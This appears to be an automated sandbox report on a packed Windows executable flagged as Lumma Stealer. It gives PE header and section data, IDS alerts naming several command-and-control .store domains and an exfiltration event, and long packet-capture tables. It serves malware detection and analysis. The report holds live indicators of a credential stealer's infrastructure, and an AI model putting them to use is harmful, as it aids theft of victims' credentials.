Entrypoint: 0x717000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction: jmp 00007F1FDCDD7B8Ah
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5a054 | 0x68 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x59000 | 0x340 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5a1f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x58000 | 0x27e00 | 128f08adcfcba3832723e4387ccab601 | False | 0.998114224137931 | data | 7.981720932479415 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x59000 | 0x340 | 0x400 | 914cd139a383496d0085d499d138ef92 | False | 0.390625 | data | 4.997389973748798 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x5a000 | 0x1000 | 0x200 | 555a11fa24a077379003c187d9c9d020 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| hlkscldd | 0x5b000 | 0x2bb000 | 0x2ba200 | e246e1d9692bf4da7b5db1e3b0df5e3b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| rdxnvvje | 0x316000 | 0x1000 | 0x400 | 6001c67b225da1053312cda47a57ff0a | False | 0.7919921875 | data | 6.128386280223348 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x317000 | 0x3000 | 0x2200 | b95d91fddb9e4577d32dbcd50f5745a2 | False | 0.060546875 | DOS executable (COM) | 0.7581386604376292 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_MANIFEST | 0x59058 | 0x2e6 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.45417789757412397 |
| DLL | Import |
| kernel32.dll | lstrcpy |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| 2024-10-31T11:27:50.193064+0100 | 2057131 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) | 1 | 192.168.2.5 | 57098 | 1.1.1.1 | 53 | UDP |
| 2024-10-31T11:27:50.209112+0100 | 2057129 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) | 1 | 192.168.2.5 | 60473 | 1.1.1.1 | 53 | UDP |
| 2024-10-31T11:27:50.219788+0100 | 2057127 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) | 1 | 192.168.2.5 | 56136 | 1.1.1.1 | 53 | UDP |
| 2024-10-31T11:27:50.243010+0100 | 2057125 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) | 1 | 192.168.2.5 | 52698 | 1.1.1.1 | 53 | UDP |
| 2024-10-31T11:27:50.254410+0100 | 2057123 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) | 1 | 192.168.2.5 | 57112 | 1.1.1.1 | 53 | UDP |
| 2024-10-31T11:27:50.935268+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:50.935268+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:51.684144+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:51.684144+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:52.428175+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:52.428175+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:52.922763+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:52.922763+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49706 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:53.818091+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:53.818091+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:55.282025+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:55.282025+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:56.680878+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:56.680878+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:58.356580+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49710 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:58.356580+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49710 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:27:59.019842+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49710 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:28:00.140619+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:28:00.140619+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:28:02.159347+0100 | 2057124 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) | 1 | 192.168.2.5 | 49712 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:28:02.159347+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49712 | 188.114.96.3 | 443 | TCP |
| 2024-10-31T11:28:07.028474+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.5 | 49713 | TCP |
| 2024-10-31T11:28:45.280437+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.12.23.50 | 443 | 192.168.2.5 | 49912 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
| Oct 31, 2024 11:27:50.318909883 CET | 49705 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:50.318986893 CET | 443 | 49705 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:50.319082022 CET | 49705 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:50.320538998 CET | 49705 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:50.320574045 CET | 443 | 49705 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:50.935081959 CET | 443 | 49705 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:50.935267925 CET | 49705 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:50.969017982 CET | 49705 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:50.969057083 CET | 443 | 49705 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:50.969516993 CET | 443 | 49705 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:51.017926931 CET | 49705 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:51.185570002 CET | 49705 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:51.185630083 CET | 49705 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:51.185734987 CET | 443 | 49705 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:51.684159994 CET | 443 | 49705 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:51.684251070 CET | 443 | 49705 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:51.684295893 CET | 49705 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:51.699903965 CET | 49705 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:51.699935913 CET | 443 | 49705 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:51.699954033 CET | 49705 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:51.699959993 CET | 443 | 49705 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:51.821034908 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:51.821074963 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:51.821136951 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:51.821474075 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:51.821484089 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.428025007 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.428174973 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:52.429413080 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:52.429425955 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.429677010 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.430932045 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:52.430977106 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:52.431006908 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.922769070 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.922837973 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.922868967 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.922899008 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.922924042 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:52.922929049 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.922952890 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.922983885 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:52.923008919 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:52.923261881 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.923321009 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.923363924 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:52.923371077 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:52.971076012 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:52.971106052 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:53.017949104 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:53.040117025 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:53.040219069 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:53.040251970 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:53.040306091 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:53.040324926 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:53.040363073 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:53.040376902 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:53.040411949 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:53.040693045 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:53.040704966 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:53.040750027 CET | 49706 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:53.040755033 CET | 443 | 49706 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:53.216659069 CET | 49707 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:53.216705084 CET | 443 | 49707 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:53.216948986 CET | 49707 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:53.217381954 CET | 49707 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:53.217403889 CET | 443 | 49707 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:53.817893982 CET | 443 | 49707 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:53.818090916 CET | 49707 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:53.847140074 CET | 49707 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:53.847178936 CET | 443 | 49707 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:53.847553015 CET | 443 | 49707 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:53.848808050 CET | 49707 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:53.848959923 CET | 49707 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:53.848990917 CET | 443 | 49707 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:54.573153019 CET | 443 | 49707 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:54.573266029 CET | 443 | 49707 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:54.573344946 CET | 49707 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:54.573513031 CET | 49707 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:54.573535919 CET | 443 | 49707 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:54.666923046 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:54.666968107 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:54.667063951 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:54.667359114 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:54.667373896 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:55.281821012 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:55.282025099 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:55.283858061 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:55.283869982 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:55.284132957 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:55.285382986 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:55.285588026 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:55.285628080 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:55.285696030 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:55.285703897 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:55.838068962 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:55.838320017 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:55.838466883 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:55.840552092 CET | 49708 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:55.840574026 CET | 443 | 49708 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:56.064207077 CET | 49709 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:56.064260960 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:56.064328909 CET | 49709 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:56.064635992 CET | 49709 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:56.064646959 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:56.680756092 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:56.680877924 CET | 49709 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:56.682152987 CET | 49709 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:56.682162046 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:56.682441950 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:56.683900118 CET | 49709 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:56.684099913 CET | 49709 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:56.684129000 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:56.684215069 CET | 49709 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:56.684223890 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:57.347186089 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:57.347558022 CET | 49709 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:57.347572088 CET | 443 | 49709 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:57.347639084 CET | 49709 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:57.623469114 CET | 49710 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:57.623519897 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:57.623632908 CET | 49710 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:57.623966932 CET | 49710 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:57.623985052 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:58.356462002 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:58.356580019 CET | 49710 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:58.357799053 CET | 49710 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:58.357810974 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:58.358047009 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:58.359224081 CET | 49710 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:58.359342098 CET | 49710 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:58.359352112 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:59.019865990 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:59.019980907 CET | 443 | 49710 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:59.020036936 CET | 49710 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:59.020136118 CET | 49710 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:59.494389057 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:59.494457960 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:27:59.494551897 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:59.494849920 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:27:59.494867086 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:28:00.140445948 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:28:00.140619040 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:28:00.142417908 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:28:00.142422915 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:28:00.142862082 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:28:00.144391060 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:28:00.145232916 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:28:00.145272970 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:28:00.145384073 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:28:00.145411968 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:28:00.145534992 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:28:00.145569086 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:28:00.145716906 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:28:00.145745993 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:28:00.145958900 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:28:00.145987988 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:28:00.146167040 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:28:00.146199942 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:28:00.146214008 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:28:00.146225929 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:28:00.146384954 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
| Oct 31, 2024 11:28:00.146425962 CET | 443 | 49711 | 188.114.96.3 | 192.168.2.5 |
| Oct 31, 2024 11:28:00.146461010 CET | 49711 | 443 | 192.168.2.5 | 188.114.96.3 |
                                                                Oct 31, 2024 11:28:00.146603107 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.146641016 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.156112909 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.156331062 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.156380892 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:00.156397104 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.156433105 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.156471014 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:00.157001019 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:01.893723011 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:01.893935919 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:01.894036055 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:01.894117117 CET49711443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:01.894130945 CET44349711188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:01.943557024 CET49712443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:01.943603992 CET44349712188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:01.943698883 CET49712443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:01.944048882 CET49712443192.168.2.5188.114.96.3
                                                                Oct 31, 2024 11:28:01.944062948 CET44349712188.114.96.3192.168.2.5
                                                                Oct 31, 2024 11:28:02.159347057 CET49712443192.168.2.5188.114.96.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 11:27:50.193063974 CET | 57098 | 53 | 192.168.2.5 | 1.1.1.1
Oct 31, 2024 11:27:50.202379942 CET | 53 | 57098 | 1.1.1.1 | 192.168.2.5
Oct 31, 2024 11:27:50.209111929 CET | 60473 | 53 | 192.168.2.5 | 1.1.1.1
